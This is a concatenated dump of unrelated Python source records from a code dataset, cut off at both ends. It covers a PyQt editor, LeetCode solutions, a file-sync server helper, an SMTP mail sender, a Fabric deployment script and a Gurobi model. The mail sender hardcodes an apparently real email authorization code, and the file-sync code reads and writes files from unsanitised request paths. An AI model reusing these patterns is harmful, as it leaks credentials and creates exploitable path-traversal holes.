self.blockBoundingRect(block).height()\n block_number += 1\n\n def line_number_area_width(self):\n digits = len(str(self.blockCount()))\n space = 3 + self.fontMetrics().width(\"9\") * digits\n return space\n\n def resizeEvent(self, event):\n QPlainTextEdit.resizeEvent(self, event)\n cr = self.contentsRect()\n self.lineNumberArea.setGeometry(QRect(cr.left(), cr.top(), self.line_number_area_width(), cr.height()))\n\n @pyqtSlot(int)\n def updateline_number_area_width(self, new_block_count):\n self.setViewportMargins(self.line_number_area_width(), 0, 0, 0)\n\n @pyqtSlot()\n def highlight_current_line(self):\n extra_selections = []\n selection = QTextEdit.ExtraSelection()\n line_color = QColor(Qt.green).lighter(170)\n selection.format.setBackground(line_color)\n selection.format.setProperty(QTextFormat.FullWidthSelection, True)\n selection.cursor = self.textCursor()\n selection.cursor.clearSelection()\n extra_selections.append(selection)\n self.setExtraSelections(extra_selections)\n\n @pyqtSlot(QRect, int)\n def update_line_number_area(self, rect, dy):\n if dy:\n self.lineNumberArea.scroll(0, dy)\n else:\n self.lineNumberArea.update(0, rect.y(), self.lineNumberArea.width(), rect.height())\n if rect.contains(self.viewport().rect()):\n self.updateline_number_area_width(0)\n","sub_path":"Quellcode/codeeditor.py","file_name":"codeeditor.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"71877138","text":"# Given a binary search tree (BST) with duplicates, \n# find all the mode(s) (the most frequently occurred element) in the given BST.\n\n# Assume a BST is defined as follows:\n\n# The left subtree of a node contains only nodes with keys less than or equal to the node's key.\n# The right subtree of a node contains only nodes with keys greater than or equal to the node's key.\n# Both the left and right subtrees must also be binary search trees.\n# For example:\n# Given BST [1,null,2,2],\n# 1\n# \\\n# 2\n# /\n# 2\n# return [2].\n\n# Note: If a tree has more than one mode, you can return them in any order.\n\n# Follow up: Could you do that without using any extra space? \n# (Assume that the implicit stack space incurred due to recursion does not count).\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def findMode(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n stack, cnt, prev, max_cnt, mode = [], 0, None, 0, []\n while stack or root:\n if root:\n stack.append(root)\n root = root.left\n else:\n root = stack.pop()\n if prev is None:\n prev = root.val\n cnt = 1\n elif prev != root.val:\n cnt = 1\n prev = root.val\n else:\n cnt += 1\n if cnt > max_cnt:\n max_cnt = cnt\n mode = [prev]\n elif cnt == max_cnt:\n mode.append(root.val)\n root = root.right\n return mode\n \nclass Solution(object):\n def findMode(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n stack, cnt, prev, max_cnt, mode = [], 0, None, 0, []\n while stack or root:\n if root:\n stack.append(root)\n root = root.left\n else:\n root = stack.pop()\n if prev is None:\n prev = root.val\n cnt = 1\n elif prev != root.val:\n cnt = 1\n prev = root.val\n else:\n cnt += 1\n if cnt > max_cnt:\n max_cnt = cnt\n mode = [prev]\n elif cnt == max_cnt:\n mode.append(root.val)\n root = root.right\n return mode\n \nclass Solution(object):\n def findMode(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n counter = collections.Counter()\n def dfs(root):\n if not root: return\n counter[root.val] += 1\n dfs(root.left)\n dfs(root.right)\n dfs(root)\n maxn = max(counter.values()+[None])\n \n return [e for e, v in counter.items() if v == maxn]\n \n\nfrom collections import Counter\nclass Solution(object):\n def findMode(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if not root: return []\n nums = Counter(self.help_(root))\n max_value = nums.most_common(1)[0][1]\n return [key for key, value in nums.items() if value==max_value]\n \n def help_(self, root):\n if not root: return []\n return self.help_(root.left) + [root.val] + self.help_(root.right)\n \n \nclass Solution(object):\n def findMode(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if not root:\n return []\n count = collections.defaultdict(int)\n def preorder(root):\n if root:\n\n count[root.val] += 1\n preorder(root.left)\n preorder(root.right)\n preorder(root)\n max_occ = max(count.values())\n return [k for k in count if count[k] == max_occ]\n","sub_path":"LEETCODE/0501. Find Mode in Binary Search Tree.py","file_name":"0501. Find Mode in Binary Search Tree.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"648801282","text":"'''\nCreated on Feb 22, 2013\n\n@author: Ken\n'''\nimport os\nimport hashlib\n\ndef hashfile(afile, hasher, blocksize=65536):\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(blocksize)\n return hasher.digest()\n\ndef get_file_checksum( filepath, hasher ):\n blocksize = 65536\n fd = open(filepath, 'rb')\n buf = fd.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = fd.read(blocksize)\n return hasher.hexdigest()\n \ndef put_file( path, content_type, file_data):\n if content_type.find('text') == -1:\n mode = 'wb+'\n else:\n mode = 'w+'\n fd = open(path, mode)\n fd.write(file_data)\n fd.close()\n return '200 OK'\n \ndef get_file_list( path, ext=None ):\n file_list = []\n dir_list = os.listdir(path)\n for file_name in dir_list:\n if not os.path.isdir(path + file_name):\n if ext != None:\n if file_name.endswith(ext):\n file_list.append(file_name)\n else:\n file_list.append(file_name)\n return file_list\n\ndef get_file_list_with_checksum( path, ext=None ):\n file_list = []\n dir_list = os.listdir(path)\n for file_name in dir_list:\n if not os.path.isdir(path + file_name):\n if ext != None:\n if file_name.endswith(ext):\n file_checksum = get_file_checksum( path + file_name, hashlib.md5() )\n file_list.append(file_name + ':' + str(file_checksum))\n else:\n file_checksum = get_file_checksum( path + file_name, hashlib.md5() )\n file_list.append(file_name + ':' + str(file_checksum))\n return file_list\n\ndef get_file(path):\n file_data = ''\n try:\n if path.find('.jpg') != -1:\n fd = open(path, 'rb')\n file_data = fd.read()\n elif path.find('.apk') != -1:\n fd = open(path, 'rb')\n file_data = fd.read()\n else:\n file_data = ''\n fd = open(path, 'r')\n for line in fd:\n file_data += line\n fd.close()\n except:\n pass\n return file_data\n \ndef get(global_config, path, with_checksum=False):\n \n # if the requested path starts with 'static', then let's assume that\n # the request knows the full path that it's looking for, otherwise, \n # we will prepend the path with the path to the data directory\n if path.startswith('static'):\n fullpath = './' + path\n else: \n fullpath = './static/data/' + path\n \n # if the path refers to a directory, then return the list of files in the directory\n # otherwise, return the contents of the file\n if os.path.isdir(fullpath):\n if with_checksum is False:\n file_list = get_file_list(fullpath)\n else:\n file_list = get_file_list_with_checksum(fullpath)\n response_body = ''\n for file_name in file_list:\n response_body += file_name + '\\n'\n else:\n response_body = get_file(fullpath)\n return response_body\n\ndef put(global_config, path, content_type, msg_body):\n \n # if the requested path starts with 'static', then let's assume that\n # the request knows the full path that it's looking for, otherwise, \n # we will prepend the path with the path to the data directory\n if path.startswith('static'):\n fullpath = './' + path\n else: \n fullpath = './static/data/' + path\n\n # make sure that the destination directory exists\n if not os.path.exists(os.path.dirname(fullpath)):\n os.makedirs(os.path.dirname(fullpath))\n \n put_file(fullpath, content_type, msg_body)\n\n\n","sub_path":"CentralApp/src/FileSync.py","file_name":"FileSync.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"161245787","text":"\"\"\"\n1. 定义“动物”、“猫”、“动物园”三个类,动物类不允许被实例化。\n2. 动物类要求定义“类型”、“体型”、“性格”、“是否属于凶猛动物”四个属性,是否属于凶猛动物的判断标准是:“体型 >= 中等”并且是“食肉类型”同时“性格凶猛”。\n3. 猫类要求有“叫声”、“是否适合作为宠物”以及“名字”三个属性,其中“叫声”作为类属性,猫类继承自动物类。\n4. 动物园类要求有“名字”属性和“添加动物”的方法,“添加动物”方法要实现同一只动物(同一个动物实例)不能被重复添加的功能。\n\"\"\"\n\nfrom abc import ABCMeta\n\n\nclass Zoo(object):\n \"\"\"\n Zoo 动物园\n \"\"\"\n __instance = False\n list_animal = []\n\n def __new__(cls, *args, **kwargs):\n if cls.__instance:\n return cls.__instance\n cls.__instance = object.__new__(cls)\n return cls.__instance\n\n def __init__(self, name):\n self.name = name\n\n def add_animal(self, animal):\n if animal not in self.list_animal:\n self.list_animal.append(animal)\n else:\n # return self.list_animal[animal]\n print('已经存在')\n\n def __getattr__(self, item):\n \"\"\"\n 动物园是否有 item 这种动物\n :param item:动物某子类名\n :return:\n \"\"\"\n try:\n for animal in self.list_animal:\n if isinstance(animal, eval(item)):\n return True\n except:\n pass\n return False\n\n\nclass Animal(metaclass=ABCMeta):\n \"\"\"\n Animal 动物\n \"\"\"\n\n def __init__(self, types, shape, character):\n \"\"\"\n\n :param types:类型\n :param shape:体型 (假设体型有 大 中 小 三类,分别对应 3 ,2, 1,体型 >= 中等,表示为 非小)\n :param character:性格\n \"\"\"\n self.types = types\n self.shape = shape\n self.character = character\n\n if shape != '小' and types == '食肉' and character == '凶猛':\n self.isdanger = True\n else:\n self.isdanger = False\n\n\nclass Cat(Animal):\n \"\"\"\n Cat 猫\n \"\"\"\n\n # __instance_cat = False\n # list_animal = []\n #\n # def __new__(cls, *args, **kwargs):\n # if cls.__instance_cat:\n # return cls.__instance_cat\n # cls.v = object.__new__(cls)\n # return cls.__instance_cat\n\n def __init__(self, name, types, shape, character, ispet=True):\n \"\"\"\n\n :param name: 名字\n :param types: 类型\n :param shape: 体型\n :param character:性格\n :param ispet: 是否适合做宠物\n :return:\n \"\"\"\n self.name = name\n self.ispet = ispet\n super().__init__(types, shape, character)\n\n @property\n def bark(self):\n \"\"\"\n 猫 \"叫\"\n :return:\n \"\"\"\n print('tha Cat bark.')\n\n\nif __name__ == '__main__':\n # 实例化动物园\n z = Zoo('时间动物园')\n # 实例化一只猫,属性包括名字、类型、体型、性格\n cat1 = Cat('大花猫 1', '食肉', '小', '温顺')\n # 增加一只猫到动物园\n z.add_animal(cat1)\n # 动物园是否有猫这种动物\n have_cat = getattr(z, 'Cat')\n print('have_cat:', have_cat)\n","sub_path":"week07/zoofeed.py","file_name":"zoofeed.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"595680138","text":"__author__ = 'Mingjieshao'\n\ndef laceStrings(s1, s2):\n \"\"\"\n s1 and s2 are strings.\n\n Returns a new str with elements of s1 and s2 interlaced,\n beginning with s1. If strings are not of same length,\n then the extra elements should appear at the end.\n \"\"\"\n # Your Code Here\n stringLen = max(len(s1),len(s2))\n str = \"\"\n\n for i in range(stringLen):\n if i < len(s1):\n str+=s1[i]\n if i < len(s2):\n str+=s2[i]\n\n return str\n\nprint(laceStrings(\"abcd\",\"efghi\"))\n\n","sub_path":"Mid-Exam/Problem5.py","file_name":"Problem5.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"413147786","text":"import smtplib\r\nfrom os import path\r\nimport os\r\nfrom email.header import Header\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import parseaddr, formataddr\r\nimport os\r\n\r\n\r\nclass SendMail(object):\r\n smtp_server = \"smtp.qq.com\"\r\n password = \"fkgngrwblphqdjah\"\r\n # from_addr = \"qq2509934810@163.com\"\r\n from_addr = \"2509934810@qq.com\"\r\n\r\n\r\n def __init__(self, text, sender, receiver, subject, address):\r\n self.text = text\r\n self.sender = sender\r\n self.receiver = receiver\r\n self.subject = subject\r\n self.address = address\r\n self.to_addr = address\r\n\r\n self.msg = MIMEText(self.text, \"plain\", \"utf-8\")\r\n self.msg[\"From\"] = self._format_addr(self.sender + \"<\" + self.from_addr + \">\")\r\n self.msg[\"To\"] = self._format_addr(self.receiver + \"<\" + self.to_addr + \">\")\r\n self.msg[\"Subject\"] = Header(self.subject, \"utf-8\").encode()\r\n\r\n def _format_addr(self, addr):\r\n name, addr = parseaddr(addr)\r\n return formataddr((Header(name, \"utf-8\").encode(), addr))\r\n\r\n def send(self):\r\n server = smtplib.SMTP_SLL(self.smtp_server, 465)\r\n # server.set_debuglevel(1)\r\n server.login(\"2509934810@qq.com\", \"fkgngrwblphqdjah\")\r\n server.sendmail(\"2509934810@qq.com\", [self.to_addr], self.msg.as_string())\r\n server.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n client = SendMail(\r\n text=\"我是 小类 嘻嘻嘻\",\r\n sender=\"qq2509934810@163.com\",\r\n receiver=\"mr zhang\",\r\n subject=\"authentical_email\",\r\n address=\"2509934810@qq.com\",\r\n )\r\n client.send()\r\n","sub_path":"backend/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"653232604","text":"from environment import Environment\nfrom nes_py.wrappers import BinarySpaceToDiscreteSpaceEnv\nimport gym_super_mario_bros\nfrom gym_super_mario_bros.actions import SIMPLE_MOVEMENT\nimport cv2\nimport numpy as np\n\nclass MarioEnvironment(Environment) :\n\n def __init__(self,game,resized_height=0,resized_width=0,use_pixels=True) :\n self.game = game\n self.resized_height = resized_height\n self.resized_width = resized_width\n self.use_pixels = use_pixels\n self.input_size = None\n self.output_size = None\n \n def render(self) :\n self.env.render()\n\n def initialize(self) :\n self.env = gym_super_mario_bros.make(self.game)\n self.env = BinarySpaceToDiscreteSpaceEnv(self.env, SIMPLE_MOVEMENT)\n\n def clone(self) :\n return MarioEnvironment(self.game,self.resized_height,self.resized_width,self.use_pixels)\n\n def getInputSize(self) :\n if(self.input_size is None) :\n if(self.use_pixels) :\n self.input_size = self.resized_height * self.resized_width\n else :\n self.initialize()\n self.input_size = self.env.observation_space.shape[0]\n self.close()\n\n return self.input_size\n\n def getOutputSize(self) :\n if(self.output_size is None) :\n self.initialize()\n if(self.use_pixels) :\n self.output_size = self.env.action_space.n\n else :\n self.output_size = self.env.action_space.shape[0]\n self.close()\n return self.output_size\n\n def reset(self) :\n return self.env.reset()\n\n def step(self,action) :\n return self.env.step(action)\n \n def preprocess(self,state) :\n if(self.use_pixels) :\n frame = cv2.resize(state,(self.resized_width,self.resized_height))\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n return frame.reshape([self.resized_width * self.resized_height])\n return state\n\n def actionProcessor(self,action) :\n if(self.use_pixels) :\n return np.argmax(action)\n return action\n\n def close(self) :\n self.env.close()","sub_path":"NEAT/mario_environment.py","file_name":"mario_environment.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"649866776","text":"import provFs\nimport tempfile\nimport os\nimport time\nimport rcExceptions as ex\nfrom rcUtilities import which, justcall, lazy\nfrom rcBtrfs import Btrfs\n\nclass Prov(provFs.Prov):\n info = ['btrfs', 'device', 'ready']\n\n @lazy\n def mkfs(self):\n return ['mkfs.btrfs', '-f', '-L', self.label]\n\n @lazy\n def raw_label(self):\n return '{name}.' + self.r.rid.replace(\"#\", \".\")\n\n @lazy\n def label(self):\n return self.r.svc.name + '.' + self.r.rid.replace(\"#\", \".\")\n\n def is_provisioned(self):\n ret = provFs.Prov.is_provisioned(self)\n if not ret:\n return ret\n if self.subvol is None:\n return ret\n mnt = tempfile.mkdtemp()\n self.mount(mnt)\n try:\n btrfs = Btrfs(path=mnt)\n return btrfs.has_subvol(self.subvol)\n finally:\n self.cleanup(mnt)\n\n def current_label(self, mnt):\n cmd = [\"btrfs\", \"filesystem\", \"label\", mnt]\n ret, out, err = self.r.call(cmd, errlog=False)\n if ret == 0 and len(out.strip()) > 0:\n return out.strip()\n\n @lazy\n def subvol(self):\n l = self.r.mount_options.split(\",\")\n for e in l:\n if not e.startswith(\"subvol=\"):\n continue\n subvol = e.replace(\"subvol=\", \"\")\n return subvol\n\n def cleanup(self, mnt):\n cmd = [\"umount\", mnt]\n self.r.vcall(cmd)\n os.removedirs(mnt)\n\n def write_label(self, mnt):\n current_label = self.current_label(mnt)\n if current_label is not None:\n label = current_label\n raw_label = current_label.replace(self.r.svc.name, \"{name}\")\n else:\n label = self.label\n raw_label = self.raw_label\n self.r.svc.set_multi([\"%s.dev=%s\" % (self.r.rid, \"LABEL=\"+raw_label)])\n self.r.unset_lazy(\"device\")\n self.wait_label(label)\n\n def wait_label(self, label):\n if which(\"findfs\") is None:\n self.r.log.info(\"findfs program not found, wait arbitrary 20 seconds for label to be usable\")\n time.sleep(20)\n cmd = [\"findfs\", \"LABEL=\"+label]\n for i in range(20):\n out, err, ret = justcall(cmd)\n self.r.log.debug(\"%s\\n%s\\n%s\" % (\" \".join(cmd), out, err))\n if ret == 0:\n return\n self.r.log.info(\"label is not usable yet (%s)\" % err.strip())\n time.sleep(2)\n raise ex.excError(\"timeout waiting for label to become usable\")\n\n def mount(self, mnt):\n self.r.set_loopdevice()\n if self.r.loopdevice is None:\n device = self.r.device\n else:\n device = self.r.loopdevice\n cmd = [\"mount\", \"-t\", \"btrfs\", \"-o\", \"subvolid=0\", device, mnt]\n ret, out, err = self.r.vcall(cmd)\n if ret != 0:\n raise ex.excError\n\n def create_subvol(self):\n if self.subvol is None:\n return\n mnt = tempfile.mkdtemp()\n self.mount(mnt)\n try:\n self.write_label(mnt)\n self._create_subvol(mnt)\n self.r.log.info(\"subvolume %s provisioned\" % self.subvol)\n self.r.start()\n finally:\n self.cleanup(mnt)\n\n def _create_subvol(self, mnt):\n path = os.path.join(mnt, self.subvol)\n if os.path.exists(path):\n return\n cmd = [\"btrfs\", \"subvol\", \"create\", path]\n ret, out, err = self.r.vcall(cmd)\n if ret != 0:\n raise ex.excError\n\n def provisioner(self):\n if self.r.device.startswith(\"LABEL=\") or self.r.device.startswith(\"UUID=\"):\n self.r.log.info(\"skip formatting because dev is specified by LABEL or UUID\")\n else:\n provFs.Prov.provisioner_fs(self)\n self.create_subvol()\n\n\n\n","sub_path":"lib/provFsBtrfs.py","file_name":"provFsBtrfs.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"318805425","text":"import os\nimport math\nfrom random import randint\n\njump = [12]\ncut = [2]\nsteps = []\nchangeJumpTop = 24\nchangeJumpBot = 7\n\ndef changeJump(oldJump):\n\tincDec = randint(0,1)\n\tif (incDec == 0):\n\t\tnewJump = oldJump - randint(changeJumpBot,changeJumpTop)\n\telif (incDec == 1):\n\t\tnewJump = oldJump + randint(changeJumpBot,changeJumpTop)\n\twhile (newJump < 1):\n\t\tnewJump += randint(changeJumpBot,changeJumpTop)\n\twhile (newJump >= 64):\n\t\tnewJump -= randint(changeJumpBot,changeJumpTop)\n\tjump.append(newJump)\n\ndef changeCut(oldCut):\n\tnewCut = int(randint(2,21))\n\tcut.append(newCut)\n\ndef findFirstNumber(bot, top, num, numNums):\n\tfor n in range(numNums):\n\t\tcurrentSteps = 0\n\t\tcurrentNumber = bot + 1 - 1\n\t\tcurrentJump = jump[n] + 1 - 1\n\t\twhile (currentNumber != num):\n\t\t\twhile (currentNumber < num):\n\t\t\t\t#print(currentNumber)\n\t\t\t\tcurrentNumber += currentJump\n\t\t\t\tcurrentSteps += 1\n\t\t\tcurrentJump = int(currentJump/cut[n])\n\t\t\tif (currentJump == 0):\n\t\t\t\tcurrentJump = 1\n\t\t\twhile (currentNumber > num):\n\t\t\t\t#print(currentNumber)\n\t\t\t\tcurrentNumber -= currentJump\n\t\t\t\tcurrentSteps += 1\n\t\t\tcurrentJump = int(currentJump/cut[n])\n\t\t\tif (currentJump == 0):\n\t\t\t\tcurrentJump = 1\n\t\tsteps.append(currentSteps)\n\t\tchangeJump(jump[n])\n\t\tchangeCut(cut[n])\n\tprint(\"Number (\" + str(currentNumber) + \") found: Jump: \" + str(jump[n]) + \" Cut: \" + str(cut[n]) + \" Steps: \" + str(steps[n]))\n\ndef findNextNumber(bot, top, num):\n\tcurrentSteps = 0\n\tcurrentNumber = bot + 1 - 1\n\tcurrentJump = jump[i] + 1 - 1\n\twhile (currentNumber != num):\n\t\twhile (currentNumber < num):\n\t\t\tcurrentNumber += currentJump\n\t\t\tcurrentSteps += 1\n\t\tcurrentJump = int(currentJump/cut[i])\n\t\tif (currentJump == 0):\n\t\t\tcurrentJump = 1\n\t\twhile (currentNumber > num):\n\t\t\tcurrentNumber -= currentJump\n\t\t\tcurrentSteps += 1\n\t\tcurrentJump = int(currentJump/cut[i])\n\t\tif (currentJump == 0):\n\t\t\tcurrentJump = 1\n\tsteps[i] += currentSteps\n\ndef findNumbers(numNums, trials):\n\tfindFirstNumber(0, 100, 53, numNums)\n\tglobal i\n\tfor i in range(numNums):\n\t\tfor k in range(trials-1):\n\t\t\trandTop = randint(100, 100000)\n\t\t\trandNum = randTop - randint(0, randTop-100)\n\t\t\tfindNextNumber(0, randTop, randNum)\n\t\tprint(\"Numbers found: Jump: \" + str(jump[i]) + \" Cut: \" + str(cut[i]) + \" Steps: \" + str(steps[i]))\n\n\nfindNumbers(24, 200)","sub_path":"songa.py","file_name":"songa.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"342422307","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.13-x86_64/egg/reviewboard/extensions/templatetags/rb_extensions.py\n# Compiled at: 2020-02-11 04:03:56\nfrom __future__ import unicode_literals\nimport logging\nfrom django import template\nfrom django.template.loader import render_to_string\nfrom reviewboard.extensions.hooks import CommentDetailDisplayHook, HeaderActionHook, HeaderDropdownActionHook, NavigationBarHook\nfrom reviewboard.site.urlresolvers import local_site_reverse\nregister = template.Library()\n\ndef action_hooks(context, hook_cls, action_key=b'action', template_name=b'extensions/action.html'):\n \"\"\"Displays all registered action hooks from the specified ActionHook.\"\"\"\n html = []\n for hook in hook_cls.hooks:\n try:\n for actions in hook.get_actions(context):\n if actions:\n context.push()\n context[action_key] = actions\n try:\n html.append(render_to_string(template_name, context))\n except Exception as e:\n logging.error(b'Error when rendering template for action \"%s\" for hook %r in extension \"%s\": %s', action_key, hook, hook.extension.id, e, exc_info=1)\n\n context.pop()\n\n except Exception as e:\n logging.error(b'Error when running get_actions() on hook %r in extension \"%s\": %s', hook, hook.extension.id, e, exc_info=1)\n\n return (b'').join(html)\n\n\n@register.simple_tag(takes_context=True)\ndef navigation_bar_hooks(context):\n \"\"\"Displays all registered navigation bar entries.\"\"\"\n html = []\n for hook in NavigationBarHook.hooks:\n try:\n for nav_info in hook.get_entries(context):\n if nav_info:\n url_name = nav_info.get(b'url_name', None)\n if url_name:\n nav_info[b'url'] = local_site_reverse(url_name, request=context.get(b'request'))\n context.push()\n context[b'entry'] = nav_info\n html.append(render_to_string(b'extensions/navbar_entry.html', context))\n context.pop()\n\n except Exception as e:\n extension = hook.extension\n logging.error(b'Error when running NavigationBarHook.get_entries function in extension: \"%s\": %s', extension.id, e, exc_info=1)\n\n return (b'').join(html)\n\n\n@register.simple_tag(takes_context=True)\ndef header_action_hooks(context):\n \"\"\"Displays all single-entry action hooks for the header bar.\"\"\"\n return action_hooks(context, HeaderActionHook)\n\n\n@register.simple_tag(takes_context=True)\ndef header_dropdown_action_hooks(context):\n \"\"\"Displays all multi-entry action hooks for the header bar.\"\"\"\n return action_hooks(context, HeaderDropdownActionHook, b'actions', b'extensions/header_action_dropdown.html')\n\n\n@register.simple_tag(takes_context=True)\ndef comment_detail_display_hook(context, comment, render_mode):\n \"\"\"Displays all additional detail from CommentDetailDisplayHooks.\"\"\"\n assert render_mode in ('review', 'text-email', 'html-email')\n html = []\n for hook in CommentDetailDisplayHook.hooks:\n try:\n if render_mode == b'review':\n html.append(hook.render_review_comment_detail(comment))\n elif render_mode in ('text-email', 'html-email'):\n html.append(hook.render_email_comment_detail(comment, render_mode == b'html-email'))\n except Exception as e:\n extension = hook.extension\n logging.error(b'Error when running CommentDetailDisplayHook with render mode \"%s\" in extension: %s: %s', render_mode, extension.id, e, exc_info=1)\n\n return (b'').join(html)","sub_path":"pycfiles/ReviewBoard-3.0.17-py2.7/rb_extensions.py","file_name":"rb_extensions.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"57531179","text":"__author__ = 'rohanarora'\nfrom fabric.api import cd, env, task\nfrom fabric.operations import sudo, run, reboot\n\n\n# to be called on a fresh instance\n@task\ndef start_fresh():\n install_os_dependencies()\n clone_repo()\n run_doxygen()\n move_to_var_html()\n restart_apache()\n\n\n# to be called to update the documentation\n@task\ndef update():\n git_pull()\n run_doxygen()\n move_to_var_html()\n restart_apache()\n\n\n# install apache2, git, doxygen\n@task\ndef install_os_dependencies():\n packages = [\n 'apache2',\n 'git',\n 'doxygen',\n ]\n sudo('apt-get update')\n sudo('apt-get upgrade')\n reboot(120)\n sudo('apt-get -y install %s' % ' '.join(packages))\n run('git config --global url.\"https://\".insteadOf git://')\n\n\n# clones the repository\n@task\ndef clone_repo():\n run('git clone -b %s %s %s' % (env.repository_branch, env.repository_github_url, env.doxygen_root))\n\n\n# run the doxygen command\n@task\ndef run_doxygen():\n with cd(env.doxygen_root):\n run('doxygen Doxyfile')\n\n\n# update the repo; use the token as the user name; password would be blank\n@task\ndef git_pull():\n with cd(env.doxygen_root):\n run('git pull origin %s' % (env.repository_branch))\n\n\n# moves the contents of DeployingDoxygen(your repo.)/html [generated after running the doxygen command] to /var/www/html and updating permissions\n@task\ndef move_to_var_html():\n with cd(env.doxygen_root):\n sudo('cp -r * /var/www/html')\n sudo('chown -R $USER:$USER /var/www/html')\n sudo('chmod -R 755 /var/www')\n\n\n# restart apache server after making changes to config. files\n@task\ndef restart_apache():\n sudo('service apache2 restart')\n","sub_path":"documentation_server_setup.py","file_name":"documentation_server_setup.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"622088623","text":"# -*- coding: utf-8 -*-\n# @Time : 2017/11/24 11:45\n# @Author : Leo_Peng\n# @File : Case_Run.py\n# @Software: PyCharm\n#import unittest\nfrom public.Suites import *\nfrom public import HTMLTestRunner\nimport os,time\npath=os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\ncase_path =path+'/TestCase'\nresult =path+'/Result/'\ndef Creatsuite():\n #定义单元测试容器\n testunit = Suit()\n\n #定搜索用例文件的方法\n discover = unittest.defaultTestLoader.discover(case_path, pattern='Test_*.py', top_level_dir=None)\n\n #将测试用例加入测试容器中\n for test_suite in discover:\n for casename in test_suite:\n testunit.addTest(casename)\n return testunit\n\ntest_case = Creatsuite()\n\n#获取系统当前时间\nnow = time.strftime('%Y-%m-%d-%H_%M_%S', time.localtime(time.time()))\nday = time.strftime('%Y-%m-%d', time.localtime(time.time()))\n\n#定义个报告存放路径,支持相对路径\ntdresult = result + day\nif os.path.exists(tdresult):\n filename = tdresult + \"\\\\\" + now + \"_result.html\"\n fp = open(filename, 'wb')\n #定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, verbosity=2, title=u'Appium测试报告', description=u'用例详情:')\n\n #运行测试用例\n runner.run(test_case)\n fp.close() #关闭报告文件\nelse:\n os.mkdir(tdresult)\n filename = tdresult + \"\\\\\" + now + \"_result.html\"\n fp = open(filename, 'wb')\n #定义测试报告\n runner = HTMLTestRunner.HTMLTestRunner(stream=fp, verbosity=2, title=u'Appium测试报告', description=u'用例详情:')\n\n #运行测试用例\n runner.run(test_case)\n fp.close() #关闭报告文件\n","sub_path":"public/Case_Run.py","file_name":"Case_Run.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"124342530","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 25 14:09:15 2021\n\n@author: Pooja\n\"\"\"\n\nimport gurobipy as gp\nfrom gurobipy import GRB\nimport numpy as np\nimport pandas as pd\n\n\n# indices and parameters\n\nnum_pod_sites = 47\nnum_blocks = 1100\n\npod_sites = range(num_pod_sites)\nblocks = range(num_blocks)\n\nhoursOpen = 12\npeoplePerCar = 3\ncarsPerHour = 6\n\ndistance = pd.read_csv('Distances.csv', header=None, sep=',')\n\npopulation = pd.read_csv('Populations.csv', header=None, sep=',')\npopulation = population.astype(float)\n\nloadingSites = pd.read_csv('LoadingSites.csv', header=None, sep=',')\ncapacity = loadingSites * hoursOpen * peoplePerCar * carsPerHour\n\nsupplies = pd.read_csv('Supplies.csv', header=None, sep=',')\nlabor = pd.read_csv('Labor.csv', header=None, sep=',')\ncost = labor + (supplies.sum()*loadingSites*hoursOpen*carsPerHour)\n\nbudget = 1000000000000\n\n\n####### MODEL 1\nm1 = gp.Model()\n\n\n# Decision variables\nx1 = m1.addVars(pod_sites, vtype=GRB.BINARY)\ny1 = m1.addVars(pod_sites, blocks, vtype=GRB.BINARY)\n\n# Objective function\nm1.modelSense = GRB.MINIMIZE\nm1.setObjective(sum(sum(distance.iloc[k, i]*population.iloc[k]*y1[i,k] for i in pod_sites) for k in blocks))\n\n\n# Constraints\n\n## all pod sites are bounded by a given capacity\nfor i in pod_sites:\n m1.addConstr(sum(y1[i, k]*population.iloc[k] for k in 